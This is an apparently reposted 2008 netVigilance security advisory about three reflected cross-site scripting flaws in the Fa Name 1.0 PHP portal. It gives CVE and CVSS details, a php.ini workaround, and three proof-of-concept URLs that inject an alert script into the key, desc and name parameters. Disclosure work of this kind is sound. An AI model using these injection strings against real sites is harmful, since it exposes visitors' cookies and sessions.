Fa Name version 1.0 Multiple XSS Attack Vulnerabilities

2008-07-01 / 2008-07-02
Risk: Low
Local: No
Remote: Yes

netVigilance Security Advisory #43 Fa Name version 1.0 Multiple XSS Attack Vulnerabilities Description: Fa Name (http://webscripts.softpedia.com/script/Content-Management/Fa-Name-41229.html) is useful portal (CMS) for .name websites. You can have a simple portal but useful one for you domain names and by using this portal you can show your complete information like photo, identification, projects and history to the others. Successful exploitation requires PHP magic_quotes_gpc set to Off on the server for the first vulnerability and register_globals set to On for the third. External References: Mitre CVE: CVE-2007-3653 NVD NIST: CVE-2007-3653 OSVDB: Summary: Fa Name is useful portal (CMS) for .name websites. Security problem in the product allows attackers to conduct XSS attacks. Advisory URL: http://www.netvigilance.com/advisory0043 Release Date: June 30th 2008 CVSS Version 2 Metrics: Base Metrics: Exploitability Metrics: Access Vector: Network Access Complexity: Medium Authentication: None Impact Metrics: Confidentiality Impact: None Integrity Impact: Partial Availability Impact: None Temporal Metrics: Exploitability: Functional Remediation Level: Workaround Report Confidence: Uncorroborated CVSS Version 2 Vectors: Base Vector: &#65533;AV:N/AC:L/Au:N/C:N/I:P/A:N&#65533; Temporal Vector: &#65533;E:F/RL:W/RC:UR&#65533; CVSS Version 2 Scores: Base Score: 4.3 Impact Subscore: 2.9 Exploitability Subscore: 8.6 Temporal Score: 3.7 SecureScout Testcase ID: TC 17973 Vulnerable Systems: Fa Name version 1.0 Vulnerability Type: XSS (Cross-Site Scripting) to force a web-site to display malicious contents to the target, by sending a specially crafted request to the web-site. The vulnerable web-site is not the target of attack but is used as a tool for the hacker in the attack of the victim (visitor to attached vulnerable website). Vendor: FaScript Vendor Status: The Vendor has been notified Workaround: In the php.ini file set register_globals = Off or/and magic_quotes_gpc = On. Example: XSS Attack Vulnerability 1: REQUEST: http://[TARGET]/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> REPLY: will execute <script>alert(document.cookie)</script>. XSS Attack Vulnerability 2: REQUEST: http://[TARGET]/[FANAME-DIRECTORY]/index.php?desc="><script>alert(document.cookies)</script> REPLY: will execute <script>alert(document.cookie)</script>. XSS Attack Vulnerability 3: REQUEST: http://[TARGET]/[FANAME-DIRECTORY]/page.php?name=<script>alert(document.cookies)</script> REPLY: will execute <script>alert(document.cookie)</script>. Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com



Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com


Back to Top